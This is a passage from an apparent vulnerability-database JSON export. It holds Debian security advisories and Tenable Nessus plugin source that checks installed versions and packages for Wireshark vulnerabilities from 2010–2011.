http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny9_sparc.deb\n Size/MD5 checksum: 629518 6f3df69e45a48f5845a360f2b709d150\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2010-07-01T19:42:45", "type": "debian", "title": "[SECURITY] [DSA 2066-1] New wireshark packages fix several vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287"], "modified": "2010-07-01T19:42:45", "id": "DEBIAN:DSA-2066-1:00B62", "href": "https://lists.debian.org/debian-security-announce/2010/msg00110.html", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T00:19:35", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2274-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 07, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : wireshark\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-1590 CVE-2011-1957 CVE-2011-1958 CVE-2011-1959 CVE-2011-2174 CVE-2011-2175\n\nHuzaifa Sidhpurwala, David Maciejak and others discovered several\nvulnerabilities in the X.509if and DICOM dissectors and in the code to \nprocess various capture and dictionary files, which could lead to denial\nof service or the execution of arbitrary code.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-3+lenny14.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.11-6+squeeze2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.2.17-1\n\nWe recommend that you upgrade your wireshark packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-07-07T19:00:37", "type": "debian", "title": "[SECURITY] [DSA 2274-1] wireshark security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175"], "modified": "2011-07-07T19:00:37", "id": "DEBIAN:DSA-2274-1:E67D3", "href": "https://lists.debian.org/debian-security-announce/2011/msg00146.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-08-19T13:04:03", "description": "The installed version of Wireshark or Ethereal is potentially affected by multiple vulnerabilities. \n\n - The SMB dissector can be affected by a NULL pointer dereference. (Bug 4734)\n\n - The ANS.1 BER dissector can be affected by a buffer overflow.\n\n - The SMB PIPE dissector can be affected by a NULL pointer dereference on some platforms.\n\n - The SigComp Universal Decompressor Virtual Machine can be affected by an infinite loop or a buffer overflow.\n (Bug 4826, 4837)", "cvss3": {"score": null, "vector": null}, "published": "2010-06-11T00:00:00", "type": "nessus", "title": "Wireshark / Ethereal < 1.0.14 / 1.2.9 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287"], "modified": "2018-08-07T00:00:00", "cpe": ["cpe:/a:wireshark:wireshark"], "id": "WIRESHARK_1_2_9.NASL", "href": "https://www.tenable.com/plugins/nessus/46864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46864);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/08/07 11:56:12\");\n\n script_cve_id(\n \"CVE-2010-2283\",\n \"CVE-2010-2284\",\n \"CVE-2010-2285\",\n \"CVE-2010-2286\",\n \"CVE-2010-2287\"\n );\n script_bugtraq_id(40728, 42618);\n script_xref(name:\"Secunia\", value:\"40112\");\n\n script_name(english:\"Wireshark / Ethereal < 1.0.14 / 1.2.9 Multiple Vulnerabilities\");\n script_summary(english:\"Does a version check\");\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The remote host has an application that is affected by multiple\nvulnerabilities.\"\n );\n script_set_attribute(attribute:\"description\",value:\n\"The installed version of Wireshark or Ethereal is potentially\naffected by multiple vulnerabilities. \n\n - The SMB dissector can be affected by a NULL pointer\n dereference. (Bug 4734)\n\n - The ANS.1 BER dissector can be affected by a buffer\n overflow.\n\n - The SMB PIPE dissector can be affected by a NULL pointer\n dereference on some platforms.\n\n - The SigComp Universal Decompressor Virtual Machine can\n be affected by an infinite loop or a buffer overflow.\n (Bug 4826, 4837)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/security/wnpa-sec-2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/security/wnpa-sec-2010-06.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Wireshark version 1.0.14 / 1.2.9 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/11\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wireshark:wireshark\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"wireshark_installed.nasl\");\n script_require_keys(\"SMB/Wireshark/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\n\n# Check each install.\ninstalls = get_kb_list(\"SMB/Wireshark/*\");\nif (isnull(installs)) exit(0, \"The 'SMB/Wireshark/*' KB items are missing.\");\n\ninfo = \"\";\ninfo2 = \"\";\nforeach install(keys(installs))\n{\n if (\"/Installed\" >< install) continue;\n\n version = install - \"SMB/Wireshark/\";\n ver = split(version, sep:\".\", keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Affects 0.8.20 to 1.0.13 AND 1.2.0 to 1.2.8\n if (\n (\n (ver[0] == 0 && ((ver[1] == 8 && ver[2] >= 20) || ver[1] >= 9 ))\n ||\n (ver[0] == 1 && ver[1] ==0 && ver[2] < 14)\n )\n ||\n (\n ver[0] == 1 && ver[1] == 2 && ver[2] <= 8\n ) \n )\n info +=\n '\\n Path : ' + installs[install] +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.2.9 / 1.0.14\\n';\n else\n info2 += ' - Version ' + version + ', under ' + installs[install] +'\\n';\n}\n\n# Report if any were found to be vulnerable\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 4) s = \"s of Wireshark / Ethereal are\";\n else s = \" of Wireshark / Ethereal is\";\n\n report = \n '\\n' +\n 'The following vulnerable instance' + s + ' installed :\\n' +\n '\\n' + info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nif (info2)\n exit(0, \"The following instance(s) of Wireshark / Ethereal are installed and are not vulnerable : \"+info2);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:32:44", "description": "- Wed Jan 5 2011 Jan Safranek <jsafrane at redhat.com> - 1.2.13-2\n\n - fixed buffer overflow in ENTTEC dissector (#666897)\n\n - Mon Nov 22 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.13-1\n\n - upgrade to 1.2.13\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.1 3.html\n\n - Mon Sep 13 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.11-1\n\n - upgrade to 1.2.11\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.1 1.html\n\n - Resolves: #632539\n\n - Tue Aug 24 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.10-1\n\n - upgrade to 1.2.10\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.1 0.html\n\n - Resolves: #625940 CVE-2010-2287 CVE-2010-2286 CVE-2010-2284 CVE-2010-2283\n\n - Mon May 17 2010 Radek Vokal <rvokal at redhat.com> - 1.2.8-3\n\n - removing traling bracket from python_sitearch (#592391)\n\n - Fri May 7 2010 Radek Vokal <rvokal at redhat.com> - 1.2.8-2\n\n - add libtool patch\n\n - Fri May 7 2010 Radek Vokal <rvokal at redhat.com> - 1.2.8-1\n\n - use sitearch instead of sitelib to avoid pyo and pyc conflicts\n\n - upgrade to 1.2.8\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.8 .html\n\n - rebuild with GeoIP support (needs to be turned on in IP protocol preferences)\n\n - bring back -pie\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-01-14T00:00:00", "type": "nessus", "title": "Fedora 13 : wireshark-1.2.13-2.fc13 (2011-0167)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-4538"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2011-0167.NASL", "href": "https://www.tenable.com/plugins/nessus/51519", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-0167.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51519);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-4538\");\n script_xref(name:\"FEDORA\", value:\"2011-0167\");\n\n script_name(english:\"Fedora 13 : wireshark-1.2.13-2.fc13 (2011-0167)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Wed Jan 5 2011 Jan Safranek <jsafrane at redhat.com> -\n 1.2.13-2\n\n - fixed buffer overflow in ENTTEC dissector (#666897)\n\n - Mon Nov 22 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.13-1\n\n - upgrade to 1.2.13\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.1\n 3.html\n\n - Mon Sep 13 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.11-1\n\n - upgrade to 1.2.11\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.1\n 1.html\n\n - Resolves: #632539\n\n - Tue Aug 24 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.10-1\n\n - upgrade to 1.2.10\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.1\n 0.html\n\n - Resolves: #625940 CVE-2010-2287 CVE-2010-2286\n CVE-2010-2284 CVE-2010-2283\n\n - Mon May 17 2010 Radek Vokal <rvokal at redhat.com> -\n 1.2.8-3\n\n - removing traling bracket from python_sitearch\n (#592391)\n\n - Fri May 7 2010 Radek Vokal <rvokal at redhat.com> -\n 1.2.8-2\n\n - add libtool patch\n\n - Fri May 7 2010 Radek Vokal <rvokal at redhat.com> -\n 1.2.8-1\n\n - use sitearch instead of sitelib to avoid pyo and pyc\n conflicts\n\n - upgrade to 1.2.8\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.8\n .html\n\n - rebuild with GeoIP support (needs to be turned on in\n IP protocol preferences)\n\n - bring back -pie\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.11.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.11.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.13.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.13.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.8.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=666894\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-January/053061.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b7bb23f3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"wireshark-1.2.13-2.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:03:53", "description": "Several remote vulnerabilities have been discovered in the Wireshark network traffic analyzer. It was discovered that NULL pointer dereferences, buffer overflows and infinite loops in the SMB, SMB PIPE, ASN1.1 and SigComp dissectors could lead to denial of service or the execution of arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2010-07-02T00:00:00", "type": "nessus", "title": "Debian DSA-2066-1 : wireshark - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:wireshark", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2066.NASL", "href": "https://www.tenable.com/plugins/nessus/47584", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2066. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47584);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\");\n script_bugtraq_id(40728);\n script_xref(name:\"DSA\", value:\"2066\");\n\n script_name(english:\"Debian DSA-2066-1 : wireshark - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in the Wireshark\nnetwork traffic analyzer. It was discovered that NULL pointer\ndereferences, buffer overflows and infinite loops in the SMB, SMB\nPIPE, ASN1.1 and SigComp dissectors could lead to denial of service or\nthe execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2010/dsa-2066\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wireshark packages.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.0.2-3+lenny9.\n\nFor the upcoming stable distribution (squeeze) and the unstable\ndistribution (sid), these problems have been fixed in version 1.2.9-1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"tshark\", reference:\"1.0.2-3+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"wireshark\", reference:\"1.0.2-3+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"wireshark-common\", reference:\"1.0.2-3+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"wireshark-dev\", reference:\"1.0.2-3+lenny9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:34:56", "description": "- Mon Jan 17 2011 Jan Safranek <jsafrane at redhat.com> - 1.2.14-1\n\n - upgrade to 1.2.14\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.1 4.html\n\n - Wed Jan 5 2011 Jan Safranek <jsafrane at redhat.com> - 1.2.13-2\n\n - fixed buffer overflow in ENTTEC dissector (#666897)\n\n - Mon Nov 22 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.13-1\n\n - upgrade to 1.2.13\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.1 3.html\n\n - Mon Sep 13 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.11-1\n\n - upgrade to 1.2.11\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.1 1.html\n\n - Resolves: #632539\n\n - Tue Aug 24 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.10-1\n\n - upgrade to 1.2.10\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.1 0.html\n\n - Resolves: #625940 CVE-2010-2287 CVE-2010-2286 CVE-2010-2284 CVE-2010-2283\n\n - Mon May 17 2010 Radek Vokal <rvokal at redhat.com> - 1.2.8-3\n\n - removing traling bracket from python_sitearch (#592391)\n\n - Fri May 7 2010 Radek Vokal <rvokal at redhat.com> - 1.2.8-2\n\n - add libtool patch\n\n - Fri May 7 2010 Radek Vokal <rvokal at redhat.com> - 1.2.8-1\n\n - use sitearch instead of sitelib to avoid pyo and pyc conflicts\n\n - upgrade to 1.2.8\n\n - see http://www.wireshark.org/docs/relnotes/wireshark-1.2.8 .html\n\n - rebuild with GeoIP support (needs to be turned on in IP protocol preferences)\n\n - bring back -pie\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-02-03T00:00:00", "type": "nessus", "title": "Fedora 13 : wireshark-1.2.14-1.fc13 (2011-0460)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2011-0444", "CVE-2011-0445"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2011-0460.NASL", "href": "https://www.tenable.com/plugins/nessus/51854", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-0460.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51854);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0444\", \"CVE-2011-0445\");\n script_xref(name:\"FEDORA\", value:\"2011-0460\");\n\n script_name(english:\"Fedora 13 : wireshark-1.2.14-1.fc13 (2011-0460)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Mon Jan 17 2011 Jan Safranek <jsafrane at redhat.com> -\n 1.2.14-1\n\n - upgrade to 1.2.14\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.1\n 4.html\n\n - Wed Jan 5 2011 Jan Safranek <jsafrane at redhat.com> -\n 1.2.13-2\n\n - fixed buffer overflow in ENTTEC dissector (#666897)\n\n - Mon Nov 22 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.13-1\n\n - upgrade to 1.2.13\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.1\n 3.html\n\n - Mon Sep 13 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.11-1\n\n - upgrade to 1.2.11\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.1\n 1.html\n\n - Resolves: #632539\n\n - Tue Aug 24 2010 Jan Safranek <jsafrane at redhat.com>\n - 1.2.10-1\n\n - upgrade to 1.2.10\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.1\n 0.html\n\n - Resolves: #625940 CVE-2010-2287 CVE-2010-2286\n CVE-2010-2284 CVE-2010-2283\n\n - Mon May 17 2010 Radek Vokal <rvokal at redhat.com> -\n 1.2.8-3\n\n - removing traling bracket from python_sitearch\n (#592391)\n\n - Fri May 7 2010 Radek Vokal <rvokal at redhat.com> -\n 1.2.8-2\n\n - add libtool patch\n\n - Fri May 7 2010 Radek Vokal <rvokal at redhat.com> -\n 1.2.8-1\n\n - use sitearch instead of sitelib to avoid pyo and pyc\n conflicts\n\n - upgrade to 1.2.8\n\n - see\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.8\n .html\n\n - rebuild with GeoIP support (needs to be turned on in\n IP protocol preferences)\n\n - bring back -pie\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.11.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.11.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.13.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.13.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.14.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.14.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.8.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=669441\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=669443\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-February/053669.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?72817804\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/17\");\n 